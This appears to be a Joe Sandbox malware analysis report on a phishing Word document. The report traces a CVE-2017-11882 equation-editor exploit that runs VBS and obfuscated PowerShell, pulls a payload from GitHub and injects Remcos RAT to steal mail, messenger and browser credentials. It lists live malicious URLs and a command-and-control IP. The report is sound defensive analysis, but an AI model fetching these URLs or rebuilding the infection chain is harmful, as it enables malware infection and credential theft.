                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523191 Sample: Scan Order and Specificatio... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 57 og1.in 2->57 81 Suricata IDS alerts for network traffic 2->81 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 21 other signatures 2->87 12 WINWORD.EXE 308 48 2->12         started        signatures3 process4 dnsIp5 61 og1.in 172.67.216.244, 443, 49161, 49162 CLOUDFLARENETUS United States 12->61 63 104.168.7.8, 49167, 49169, 49171 AS-COLOCROSSINGUS United States 12->63 49 C:\Users\user\...\RN on 104.168.7.8.url, MS 12->49 dropped 51 C:\Users\user\AppData\Roaming\...\9aubsm.url, MS 12->51 dropped 53 ~WRF{E867F054-9E2E...D-A2E82224CF64}.tmp, Composite 12->53 dropped 55 2 other malicious files 12->55 dropped 115 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->115 117 Office viewer loads remote template 12->117 119 Microsoft Office drops suspicious files 12->119 17 EQNEDT32.EXE 12 12->17         started        file6 signatures7 process8 file9 47 C:\Users\...\niceworkwithpcitureupdateson.vBS, Unicode 17->47 dropped 77 Office equation editor establishes network connection 17->77 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->79 21 wscript.exe 1 17->21         started        signatures10 process11 signatures12 97 Suspicious powershell command line found 21->97 99 Wscript starts Powershell (via cmd or directly) 21->99 101 Bypasses PowerShell execution policy 21->101 103 2 other signatures 21->103 24 powershell.exe 4 21->24         started        process13 signatures14 105 Suspicious powershell command line found 24->105 107 Obfuscated command line found 24->107 109 Suspicious execution chain found 24->109 27 powershell.exe 12 5 24->27         started        process15 dnsIp16 59 raw.githubusercontent.com 185.199.111.133, 443, 49170 FASTLYUS Netherlands 27->59 111 Writes to foreign memory regions 27->111 113 Injects a PE file into a foreign processes 27->113 31 RegAsm.exe 3 13 27->31         started        signatures17 process18 dnsIp19 65 103.186.116.99, 49172, 49173, 49175 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 31->65 67 geoplugin.net 178.237.33.50, 49174, 80 ATOM86-ASATOM86NL Netherlands 31->67 45 C:\Users\user\AppData\Local\Temp\...\logs.dat, data 31->45 dropped 69 Contains functionality to bypass UAC (CMSTPLUA) 31->69 71 Detected Remcos RAT 31->71 73 Tries to steal Mail credentials (via file registry) 31->73 75 8 other signatures 31->75 36 RegAsm.exe 1 31->36         started        39 RegAsm.exe 31->39         started        41 RegAsm.exe 31->41         started        43 4 other processes 31->43 file20 signatures21 process22 signatures23 89 Tries to steal Instant Messenger accounts or passwords 36->89 91 Tries to steal Mail credentials (via file / registry access) 36->91 93 Searches for Windows Mail specific files 36->93 95 Tries to harvest and steal browser information (history, passwords, etc) 41->95

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Scan Order and Specification 01-10- 2024.docx8%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc100%AviraHEUR/Rtf.Malformed

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                og1.in2%VirustotalBrowse
                raw.githubusercontent.com0%VirustotalBrowse
                geoplugin.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://ocsp.entrust.net030%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%VirustotalBrowse
                http://b.scorecardresearch.com/beacon.js0%VirustotalBrowse
                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%VirustotalBrowse
                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%VirustotalBrowse
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                http://acdn.adnxs.com/ast/ast.js0%VirustotalBrowse
                https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%VirustotalBrowse
                https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%VirustotalBrowse
                http://cache.btrll.com/default/Pix-1x1.gif0%VirustotalBrowse
                http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%VirustotalBrowse
                http://www.diginotar.nl/cps/pkioverheid00%VirustotalBrowse
                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%VirustotalBrowse
                http://o.aolcdn.com/ads/adswrappermsni.js0%VirustotalBrowse
                https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
                http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%VirustotalBrowse
                http://www.msn.com/?ocid=iehp0%VirustotalBrowse
                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%VirustotalBrowse
                http://static.chartbeat.com/js/chartbeat.js0%VirustotalBrowse
                https://login.yahoo.com/config/login0%VirustotalBrowse
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%VirustotalBrowse
                http://www.nirsoft.net/0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%VirustotalBrowse
                https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%VirustotalBrowse
                http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%VirustotalBrowse
                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%VirustotalBrowse
                http://www.msn.com/de-de/?ocid=iehp0%VirustotalBrowse
                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%VirustotalBrowse
                http://104.168.7.80%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                og1.in
                		172.67.216.244
                		truetrueunknown
                raw.githubusercontent.com
                		185.199.111.133
                		truefalseunknown
                geoplugin.net
                		178.237.33.50
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                  		unknown
                  https://og1.in/9aubsmtrue
                    		unknown
                    103.186.116.99true
                      		unknown
                      http://104.168.7.8/510/RFGB.txttrue
                        		unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown
                        http://104.168.7.8/510/niceworkwithpcitureupdateson.tIFtrue
                          		unknown
                          http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doctrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://b.scorecardresearch.com/beacon.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                            http://acdn.adnxs.com/ast/ast.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                            http://www.imvu.comrRegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              		unknown
                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv76C6.tmp.15.drfalseunknown
                              http://ocsp.entrust.net03powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                              https://contoso.com/Licensepowershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.imvu.com/TKRegAsm.exe, 00000015.00000002.892591846.000000000020C000.00000004.00000010.00020000.00000000.sdmpfalse
                                		unknown
                                https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000F.00000002.424846056.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.424860944.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.424852696.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.894212797.0000000002DC0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.894186468.0000000002C70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.894177297.0000000002BCE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                https://deff.nelreports.net/api/report?cat=msnbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                http://go.microspowershell.exe, 0000000C.00000002.407271629.0000000002741000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    		unknown
                                    http://cache.btrll.com/default/Pix-1x1.gifbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    https://www.google.comRegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                    http://geoplugin.net/json.gp/Cpowershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://o.aolcdn.com/ads/adswrappermsni.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    http://www.msn.com/?ocid=iehpbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    https://contoso.com/powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    http://static.chartbeat.com/js/chartbeat.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    http://www.msn.com/de-de/?ocid=iehpbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                    http://104.168.7.8powershell.exe, 0000000C.00000002.407271629.00000000026A7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv76C6.tmp.15.drfalseunknown
                                    https://login.yahoo.com/config/loginRegAsm.exefalseunknown
                                    http://www.nirsoft.net/RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                    http://ocsp.entrust.net0Dpowershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.412884295.000000000263F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407271629.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                      http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                      http://www.nirsoft.net(RegAsm.exe, 0000000F.00000002.424444203.0000000000394000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                        https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalseunknown
                                        http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                          		unknown
                                          http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.ccleaner.com/go/app_cc_pro_trialkeybhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                            		unknown
                                            http://crl.entrust.net/server1.crl0powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contextual.media.net/8/nrrV73987.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                		unknown
                                                http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000011.00000002.420740850.0000000000719000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.892658708.0000000000459000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://contoso.com/Iconpowershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://contextual.media.net/bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                    		unknown
                                                    http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                      		unknown
                                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv76C6.tmp.15.drfalse
                                                        		unknown
                                                        http://www.msn.com/bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                          		unknown
                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv76C6.tmp.15.drfalse
                                                            		unknown
                                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://104.168.7.8/510/niceworkwithpcitureupdateson.tIFjEQNEDT32.EXE, 00000008.00000002.389469062.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                                  		unknown
                                                                  https://raw.githubusercontent.compowershell.exe, 0000000C.00000002.407271629.000000000253B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://cdn.at.atwola.com/_media/uac/msn.htmlbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                                      		unknown
                                                                      https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                        		unknown
                                                                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                                          		unknown
                                                                          http://go.microsoft.cgpowershell.exe, 0000000C.00000002.406976766.00000000001BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://secure.comodo.com/CPS0powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://104.168.7.8/510/RN/RN on 104.168.7.8.url.0.drfalse
                                                                                		unknown
                                                                                http://www.imvu.com/OKRegAsm.exe, 00000011.00000002.420401486.000000000033C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://policies.yahoo.com/w3c/p3p.xmlbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                                                    		unknown
                                                                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.msn.com/advertisement.ad.jsbhvD395.tmp.19.dr, bhv76C6.tmp.15.drfalse
                                                                                      		unknown
                                                                                      http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.168.7.8
                                                                                        		unknownUnited States
                                                                                        		36352AS-COLOCROSSINGUStrue
                                                                                        178.237.33.50
                                                                                        		geoplugin.netNetherlands
                                                                                        		8455ATOM86-ASATOM86NLfalse
                                                                                        185.199.111.133
                                                                                        		raw.githubusercontent.comNetherlands
                                                                                        		54113FASTLYUSfalse
                                                                                        103.186.116.99
                                                                                        		unknownunknown
                                                                                        		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                        172.67.216.244
                                                                                        		og1.inUnited States
                                                                                        		13335CLOUDFLARENETUStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1523191
                                                                                        Start date and time:2024-10-01 09:24:13 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 10m 20s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                        Number of analysed new started processes analysed:21
                                                                                        Number of new started drivers analysed:1
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Scan Order and Specification 01-10- 2024.docx
                                                                                        Detection:MAL
                                                                                        Classification:mal100.rans.phis.troj.spyw.expl.evad.winDOCX@24/33@9/5
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 71.4%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 188
                                                                                        • Number of non-executed functions: 271
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .docx
                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                        • Attach to Office via COM
                                                                                        • Scroll down
                                                                                        • Close Viewer
                                                                                        • Override analysis time to 79501.0550860841 for current running targets taking high CPU consumption
                                                                                        • Override analysis time to 159002.110172168 for current running targets taking high CPU consumption

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                                                                                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3800 because there are no executed function
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3916 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        03:25:20API Interceptor39x Sleep call for process: EQNEDT32.EXE modified
                                                                                        03:25:22API Interceptor103x Sleep call for process: powershell.exe modified
                                                                                        03:25:22API Interceptor14x Sleep call for process: wscript.exe modified
                                                                                        03:25:32API Interceptor10634205x Sleep call for process: RegAsm.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        178.237.33.50Payment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        TT12822024.xlsGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        Cdp51q2lyM.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        z1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        185.199.111.133DRAFT_PO.vbsGet hashmaliciousUnknownBrowse
                                                                                          file.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                              https://rajkamalkanna.github.io/Facebook-Login-Page/Get hashmaliciousHTMLPhisherBrowse
                                                                                                https://vinitk1509.github.io/NETFLIXGet hashmaliciousHTMLPhisherBrowse
                                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                    dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                      https://metmaskiloi.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        http://sis030.github.io/1_Netflix_Deepdive/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          https://telagremn.com/Get hashmaliciousUnknownBrowse
                                                                                                            103.186.116.99SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtfGet hashmaliciousRemcosBrowse
                                                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                                                                rnr.exeGet hashmaliciousRemcosBrowse
                                                                                                                  PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                                                                    SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtfGet hashmaliciousRemcosBrowse
                                                                                                                      SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                                                        PURCHASE ORDER.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.21143.24066.rtfGet hashmaliciousRemcosBrowse
                                                                                                                            H4Rwoh18HK.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                              PO060824.xlsGet hashmaliciousRemcosBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                og1.inPayment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                TT12822024.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                AE1169-0106202.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                raw.githubusercontent.comPayment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.110.133
                                                                                                                                DRAFT_PO.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.109.133
                                                                                                                                file.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.109.133
                                                                                                                                RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                • 185.199.110.133
                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                • 185.199.110.133
                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.109.133
                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.111.133
